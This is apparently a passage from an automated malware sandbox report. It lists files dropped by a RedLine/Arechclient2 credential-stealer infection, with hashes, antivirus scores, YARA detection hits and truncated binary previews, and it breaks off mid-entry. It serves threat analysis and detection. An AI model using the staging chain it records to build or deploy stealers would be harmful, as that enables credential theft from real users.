                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1690584
                                                                                                                                                                                                      Entropy (8bit):6.336274537980391
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24576:YrZFiXfVsiJj3+67PH7clbvwqumjji1GkjE/I:YHitsQuLwqu4jrkjEA
                                                                                                                                                                                                      MD5:9265F82E182C2452C2B4288DEA60C119
                                                                                                                                                                                                      SHA1:73D9060D5DFD48A7A0DE32589C2F53A9D12EC11A
                                                                                                                                                                                                      SHA-256:F01AEA0BF0DEB6EC641D057F2D17F3F0B095194DC18662089BAA6C19B4D5FC6B
                                                                                                                                                                                                      SHA-512:6C939080A75043DF18EDCA853C0FD6E375D69E1488544E3255D142A4E75F4DCFDDE4A673768AE6DB3B637D366AC5843E03A86648ECE127A38DF01D7A0F614752
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......c.................f..........X........................................`.......................................p.......@..*....@...................E..........................................................0C.......`.......................text....T.......V.................. ..`.itext..x....p.......Z.............. ..`.data....I.......J...j..............@....bss.....l...............................idata..*....@......................@....didata......`......................@....edata.......p......................@..@.rdata..E...........................@..@.reloc.............................@..B.rsrc........@.......t..............@..@.............`......................@..@........................................................

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\isscint.dll

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\7zip\7za.exe
                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):290592
                                                                                                                                                                                                      Entropy (8bit):6.484525296409455
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6144:iCpoP+TXSmmC5DraI3OF8epVPWsLrmgsyLPAIfvBZ2:iMmzWDWI3OFBNWsLrmgsyL3vG
                                                                                                                                                                                                      MD5:8ED7503A4A911A37B3719050962BCD93
                                                                                                                                                                                                      SHA1:1C8B8D2A8F90C98F2567287197D6A05A0231321D
                                                                                                                                                                                                      SHA-256:7D1C2CC3F4B6A1EEE8EADFFC7991DF534566DFD5E0DAD6E44F2409FF47030A95
                                                                                                                                                                                                      SHA-512:70D8AA132AB20012EE44C5E211BF3B8BB687C97589CEBD3302232395733FF878543877EE1255FA937EB1C7511C54019846AE07921E81B613F12284473E97ACD8
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........U............n........P.......P.......P.....n...........O....P.......P.......P.......P......Rich............PE..L...Np.L...........!.....P..........R........`....`..........................P.......S..................................Y.......x.......x............0.. ?... ...!...c..................................@............`..L............................text...*D.......P.................. ..`.rdata..Ik...`...p...`..............@..@.data....0....... ..................@....rsrc...x...........................@..@.reloc.../... ...0..................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\presidio.json

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\7zip\7za.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1257682
                                                                                                                                                                                                      Entropy (8bit):7.9465336841006575
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24576:/sGEIRmQ98WE2Q05LjbL2fVjmx4QQoPuukEkpeNpdbo/V3srVTUwMdWEn:UGEqmQGWv5LjP2JmxlzuukGm2IrkO
                                                                                                                                                                                                      MD5:F6378BFC75D5B4FD21DC8A6D02600DFE
                                                                                                                                                                                                      SHA1:97379C3B86F81CFA4EAAF626C8029FA87BDAEA94
                                                                                                                                                                                                      SHA-256:B524914A58727FD5D59344947E638F0A692532D3B78B4F353BE87F04F934C1CA
                                                                                                                                                                                                      SHA-512:EE1AA8AF560CFBB7630C973DD7A9EE7AABC06646D26E151CF1692DBFA6567672C923E133AE0C244F767DCB3C1206E599C2CF9BB80F8BE416D03880D1DA2E7AEE
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:.kZ......v..Jbj.\..t.A..g.p.O.E.Y^].fe.nVX..A.Po.sI....ME.....ohpPb..\.Zr.WZ.bGV.K..Y..RE.^PPw..lfJA..T]._pn^......^..`j.....u..g..Vx....qB..ISY...E.BV...AmPVAauQS.......W`M.OFl.E\.mB.rQ.]C....am...NL..CrG..q.G..bS.P...sJN.D.t.P..s..i._Lw.\d_e.n..y...X.Z....F.y.w.mV]...SR...g....\..C..pmDdj`......R.eD.X..j.H...].E..cBqx^...DP.p..p.Pr......I_....wp.U.BPuk..u..y.K.R..ESovb.w\SYC[..x.uCG..U._...aPB..BMj.GLLXa.vYCx..o.L..IaI.a.U_r...Ul..[.x..`W..t.T[.lqg....p.mf...CqwY..oF\kE.j..SmxehwoRUv.....b.n..j...._J...pJ.am.X.qvMD..RaOrH.sLMNT_....R.ZuR[...AmPg.Gb..w.]Wh...Lkyx..SQ]..K.P.Y.e.a......[....i[k.c.T.AJj..^.cHy.GEtGU..Ms.gy..].b..K.I.j..s..w.ZPTj...O.]iWE.xD...k_vgmhMP...kFNUJX..S..t..S.e_.ZVdauA..A...._..M..S..SB.gtMB]OOMD...r.a..qG.U.C...c.K....KD...f....KSp.Q.Pr..c`..p.wl.l.Ip.wSeHpZP^...yJ.Q..V.....L..mxNQ.......Y].C.e...Kv.....MN.Y.N..L]........I`ODXa..T..np.S..d`smjl...eKO..U.._kdNt.o..s..YrE...s.._...wP.N.Z..S....j.W..SPu.A.NTbQ.uFlY.evC...s...u..Lv^w.......B..._Zismd......j..ui...

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\tributary.iso

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\7zip\7za.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):55355
                                                                                                                                                                                                      Entropy (8bit):4.637572809847945
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:768:+hQnYE49jnlqN6cs/FPQ0s6RzX85yhmVrPWZtiy6KXuT8M1PUxQU/+NaXrCfG8Nl:sJBlkVkoc2yhor+XimXm9Ud/Prr/J2
                                                                                                                                                                                                      MD5:7E6C0A41362FC54DCE3F8A531868857C
                                                                                                                                                                                                      SHA1:2588655C688AE3318B819F06B351034331B2122F
                                                                                                                                                                                                      SHA-256:6D1C1A4A407B67AB6763A9F04230F366134CD1456B5CC5FC70E8BD4EFF196B71
                                                                                                                                                                                                      SHA-512:64C3F3FF299EED757879DB2D7EE0E972ADA74B1E5F1D430B5FFCD8D88C1E74B6E073491BCAABAB3B2E05AD258439351351B71D1FB91862F74F89D721B431290E
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:A..f.OF.in..sh.c.]....bWnmQ..OZY....\.Q`....J..l.V..rE....c.q..E..u.^.^.d.wvqC^..jmf^..l....O..V...w.g.u.t.t[w.LW...TmiD...w....B..g..WJ]...SW..ydlo.T.DQw...K.F..oN.nsAa[.g....O.[D......P...Z......h...k..y....f.yoca..j.Y....o..p..^...e...U.t.TT...I......fej.O.rv.Mby.y.k.Ot.i...D.DU..T..EU.K.u..bOJ.F.X.lA.dpiHB.G.x.....`..bk.I..a][..n..b.......iFy.p..k.[mPR.MoH.^.eJ.OT.....B.[.\I.C...P.gRl.[y.idjU.I.Y.POC^.uWS.m.ile.x......U.d....YGbv..s..dD.\...GV.\...i........LW.o....r.P.Z.[...A.c.u......lSf..^fA]x..GvO.....b........oZ.a.SY.....D..ZZ..mI..[...BVSts...BLV..O.....e.OC.Y.Jd.n.s..H..we....t.r.WIO.....LpQNdm..Z.......gO.h.o.H.R.^.Org.s.qT.mf^.L..A...b.V.ZH.Sr.aX.BRE....ey.t.......y.d..L..u.h.sUp.Mb.g..Opadkq.AY...dnT.\a.A..wgIt...Y..Lw.`...V.f.B..Y....Y..P....[X.sjWOl.mJ...s.s..Od.fl..k.`g..uCw....Lv...R...nI..c...C..Q.k.bSDCD...e_XeU..f.X....]..R.P.K..SKh....F...aU.d..Q[........o..S.IEKeXL.F...G....jpgx.cB_v.u.nN.a.....t....s._BK....G...\f..K....[Xvdw...Ic...MR..`._V.Cq.`jaGx..k..u.....[G

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3zbkqbiq.dgd.psm1

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ltawufd.hkp.ps1

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ti3lsgck.3yf.psm1

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w5goga5z.kjz.ps1

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\a722c6c5

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1504972
                                                                                                                                                                                                      Entropy (8bit):7.716788411264218
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24576:qimFYgP0fddhDdoUpCM/PpP3jm5UaeUPUsj4iN5ZhQMLr9YWfovufMs:QFIX4U//BieUZ4iN5ZqMX9YWfxEs
                                                                                                                                                                                                      MD5:49ADC977A73C9B49F9288BB0716E740A
                                                                                                                                                                                                      SHA1:CAF34A2F2A6486889B8D6AC0A09EACB334806D21
                                                                                                                                                                                                      SHA-256:6CD57005B5F486D811DA81D2BAFB2800631357899F43D0535BFD31629B1F596B
                                                                                                                                                                                                      SHA-512:58295BB3D01950F87042F6A9C5A313450DD2BD6B56C648265FB4D6C96758F7BDFA63895033471EFA88806B073FF940A4A71C75B1BCD22B2FA6CC3EACA93446C6
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................E...A..X...z...a...{...f...t...X...I...r...f...t...e.............................................\...|...o.........................................................................................V...a...f...v......................................................................................\...G..|...f...;...I...x...g......................................................................;...%.............................................

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\b3be1509

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1504972
                                                                                                                                                                                                      Entropy (8bit):7.716788603822489
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24576:RimFYgP0fddhDdoUpCM/PpP3jm5UaeUPUsj4iN5ZhQMLr9YWfovufMs:rFIX4U//BieUZ4iN5ZqMX9YWfxEs
                                                                                                                                                                                                      MD5:8A4B80AF341A5097F5D5FB21B45DA531
                                                                                                                                                                                                      SHA1:572650BBACE3EF77442A231E231D20B072530FB8
                                                                                                                                                                                                      SHA-256:2DFE1BE7512B610F2560D608325453C1F116AC2833315202FD6713BCA044A4B4
                                                                                                                                                                                                      SHA-512:74CB493AD94AB1F3D0E25983514DBC74A3C55C4890ECAF7DEAAE5B419AAF49F6E451DE3BB3AD02163767B0E038F53077B623AD5071C4044A9F8F7F1BC47C57A7
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................E...A..X...z...a...{...f...t...X...I...r...f...t...e.............................................\...|...o.........................................................................................V...a...f...v......................................................................................\...G..|...f...;...I...x...g......................................................................;...%.............................................

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\bmrmmwsgmayisp

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):773632
                                                                                                                                                                                                      Entropy (8bit):6.932625623330574
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12288:vlPcUdmdXsyWvjwEzwIhJ7mnBdZhXQX8OzepFPP:Nry6cM+n/QsdP
                                                                                                                                                                                                      MD5:D174EE2651F8440F474C4001237BBCB9
                                                                                                                                                                                                      SHA1:6FB714CE75AA9365CBB12C7BED02D55CB95AE80E
                                                                                                                                                                                                      SHA-256:65C598EED6A29CF700E4FC5C4885DB8616F86AB40AF6EA00A7B7DEC9EAFD9B43
                                                                                                                                                                                                      SHA-512:6D70BD4AADC2C7EBE8D3D4702BD2B9CA79AE5E4B3938F58FB75888CC921332921BD5C919998D7874FC99839CC8F2C4373C6450A22DF57C1AF2032CAD3AE5C35E
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\bmrmmwsgmayisp, Author: Joe Security
                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\bmrmmwsgmayisp, Author: Joe Security
                                                                                                                                                                                                      • Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: C:\Users\user\AppData\Local\Temp\bmrmmwsgmayisp, Author: ditekSHen
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=.b............................^.... ........@.. .......................@..................................................K............................ ....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................@.......H.......,....>...........................................................0............ ....X...%-.&so...sp...}-..... ....X.~(.... ....Y.).... .....7...%.....~'.... ....Y.)....sq...~(.... ....Y.)....or.........%.~s.... ....X .... "...a~s.....dX(.....%.~(.... ....Y.)......~(.... ....Y.)....~0...%-.&~/.........st...%.0...(...+}....*..0........... ....X..{M...*..0............(..... .p..Y. ...@\...\a..Z3.+.~s.... .M..X+2~...... ....^ ...l_.3.+. 4.rc H:;..+.~s.... ...X..#.......@.

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\fe387de893ce4f2ca49f16029d364dc1

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):3086407
                                                                                                                                                                                                      Entropy (8bit):7.999927416329868
                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                      SSDEEP:49152:w6qEaMJB1rKjbvhQttoadRnrOtK24AvfWOO7rpM68B0uzvEqhSsH9iQcDfm4NVBC:6RM71rKjrsWadFrE3RcO68B0uzvVAO9f
                                                                                                                                                                                                      MD5:BEAC84D3E6F07D6E7723D44371BA3A44
                                                                                                                                                                                                      SHA1:54098C2080DB8AC048695DF6989A88174F7944BD
                                                                                                                                                                                                      SHA-256:CF2004F7225A54C05A80391C9668A4D7231C1D13666CBDCA4672D001F8EDA427
                                                                                                                                                                                                      SHA-512:492F2FC27D563A0F32BFE403CA8AB5CB1FAC090DC3370CB7CCD7105A6F524689C40E2CEB645580CD82E309078CBBE7B4604C51B906BD8FEE16EDB7E3771185E2
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Preview:PK.........>gZ".%r.....+.....AUpdate.exe.............`r.P....r'...1J.....`}.>.+.F_........@sp'.O..p....p.:..(..Y=.4...2.gq.........7X.............UV...)H...L..........._.V......Z7...&....)...k.`.<..v..<z.l.=.g.W..E..m...^..D.JL}.>F...r......2.Is!k..........%..p7..L..}f..Bu...8.u..h/q..~q@..z.......a..sRG...d}H.W.....K...Yk.4i..o.'....,.9.=Y.Bh..,..i+.....|.}.%.@....<....Mn.d..........-i..i..J.'........6...6....n.....2c...S.qJW.01..G._..4.7.....C...........!).{^.CNP...ZY.$(S..W.+.j..j.Qf.bH.$.......7..8]+.n.sn...B6.ZY.ZXsX.......V...J3..^..5_.|...Z..i.._Kd...;..9UL#..}..B.....T.ud&.;..V..../"..P.._$W....z..o..2i.\.4G<.k.....8.Y..'K.....JT<y...r@j.r..*W....2*..s.+D....j.._;..u..fe...#a~......?....S..TBW...B%..v.<h..qv.....U[.Cm..{C.EB.Q.[ ..<......[...2..q!L.:.W1.........H......6.@.....~..o.u....hh......i.cx...CQR..Y.b..M....P..QGY..5.....L>|+.....P.u.O..D..O.../...{..D.O......R..6..L.HG.Z...4..aF...>I...*.......6.3.d.5R.p......V9..........

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\mhpcwjai

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Mar 10 19:40:07 2025, mtime=Mon Mar 10 19:40:15 2025, atime=Fri Mar 7 11:55:00 2025, length=2871768, window=hide
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1224
                                                                                                                                                                                                      Entropy (8bit):4.99631668816715
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:8k9wXh4dR3VlgKhlnMs5uABBfniJXSrkheyjqyFm:82wXqdRxxh1viAkQyF
                                                                                                                                                                                                      MD5:00FC4C20D05D07789E3160A968C1DC25
                                                                                                                                                                                                      SHA1:424D9DC0C39056C1F187ADAC0A23DA6FCC832519
                                                                                                                                                                                                      SHA-256:6872FFBCB9FE28666D2E0FA9BEF7CC0C8D4B8F1A2DE067C09DCB6C881F2DDFAD
                                                                                                                                                                                                      SHA-512:45C8786D17E88C74B90B10C694C55AF316F421AD227EEE67EEA321412AA932312164DCF20E38C8C2415703982A5074320EB4807896296DA6BE05FA1D3144A1DE
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:L..................F.... ...w................u.#`.....+.....................J.:..DG..Yr?.D..U..k0.&...&......vk.v......L.................t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^jZ.............................%..A.p.p.D.a.t.a...B.P.1.....jZ...Local.<......CW.^jZ......b.........................L.o.c.a.l.....N.1.....jZ....Temp..:......CW.^jZ......l.....................D...T.e.m.p.......1.....jZ...._6F5E3~1..t......jZ..jZ..............................M._.6.f.5.e.3.9.1.4.3.1.f.f.4.a.2.e.9.e.a.5.0.f.0.4.9.e.4.6.b.c.4.7.....b.2...+.gZ.f .AUpdate.exe.H......jZ..jZ...............................A.U.p.d.a.t.e...e.x.e.......~...............-.......}...........-..".....C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe../...\._.6.f.5.e.3.9.1.4.3.1.f.f.4.a.2.e.9.e.a.5.0.f.0.4.9.e.4.6.b.c.4.7.\.A.U.p.d.a.t.e...e.x.e.........|....I.J.H..K..:...`.......X.......609290...........hT..CrF.f4... .dg.......0.......hT..CrF.f4... .dg....

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp77B5.tmp

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3046000, file counter 19, database pages 10, 1st free page 10, free pages 3, cookie 0x17, schema 4, UTF-8, version-valid-for 19
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                      Entropy (8bit):2.1419659729624887
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:192:yGa/Laxy2RLNZTK5rKNVBRR7ZcDkGYk+nbBZjemk3je:Jqyy2FGNKN7Rfc4LZnbjT
                                                                                                                                                                                                      MD5:26DF572F71C67A664E513D9E0C4FBD7D
                                                                                                                                                                                                      SHA1:C1E1C04E7B550372EDDD5D8F7361F7E7D85DCB8B
                                                                                                                                                                                                      SHA-256:8099CC93A85C0BFC78B9A240FF7E8D0D1D2FAD464C01DED36174CEEF0E133FC7
                                                                                                                                                                                                      SHA-512:4992FFB7D5BA69ACD436B31578D8759A50AE568561A295CD55812BAF6E30F00F15214DBB7F5DDE5BE9F877C0A652C87D03287198B60B86E8CFB708A0B7B1E7CD
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................zp.........g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmpC79B.tmp

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3046000, file counter 19, database pages 10, 1st free page 10, free pages 3, cookie 0x17, schema 4, UTF-8, version-valid-for 19
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                      Entropy (8bit):2.1419659729624887
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:192:yGa/Laxy2RLNZTK5rKNVBRR7ZcDkGYk+nbBZjemk3je:Jqyy2FGNKN7Rfc4LZnbjT
                                                                                                                                                                                                      MD5:26DF572F71C67A664E513D9E0C4FBD7D
                                                                                                                                                                                                      SHA1:C1E1C04E7B550372EDDD5D8F7361F7E7D85DCB8B
                                                                                                                                                                                                      SHA-256:8099CC93A85C0BFC78B9A240FF7E8D0D1D2FAD464C01DED36174CEEF0E133FC7
                                                                                                                                                                                                      SHA-512:4992FFB7D5BA69ACD436B31578D8759A50AE568561A295CD55812BAF6E30F00F15214DBB7F5DDE5BE9F877C0A652C87D03287198B60B86E8CFB708A0B7B1E7CD
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................zp.........g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmpC7EA.tmp

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3046000, file counter 19, database pages 10, 1st free page 10, free pages 3, cookie 0x17, schema 4, UTF-8, version-valid-for 19
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                      Entropy (8bit):2.1419659729624887
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:192:yGa/Laxy2RLNZTK5rKNVBRR7ZcDkGYk+nbBZjemk3je:Jqyy2FGNKN7Rfc4LZnbjT
                                                                                                                                                                                                      MD5:26DF572F71C67A664E513D9E0C4FBD7D
                                                                                                                                                                                                      SHA1:C1E1C04E7B550372EDDD5D8F7361F7E7D85DCB8B
                                                                                                                                                                                                      SHA-256:8099CC93A85C0BFC78B9A240FF7E8D0D1D2FAD464C01DED36174CEEF0E133FC7
                                                                                                                                                                                                      SHA-512:4992FFB7D5BA69ACD436B31578D8759A50AE568561A295CD55812BAF6E30F00F15214DBB7F5DDE5BE9F877C0A652C87D03287198B60B86E8CFB708A0B7B1E7CD
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................zp.........g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\vpdcuvm

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):773632
                                                                                                                                                                                                      Entropy (8bit):6.932625623330574
                                                                                                                                                                                                      Encrypted:false
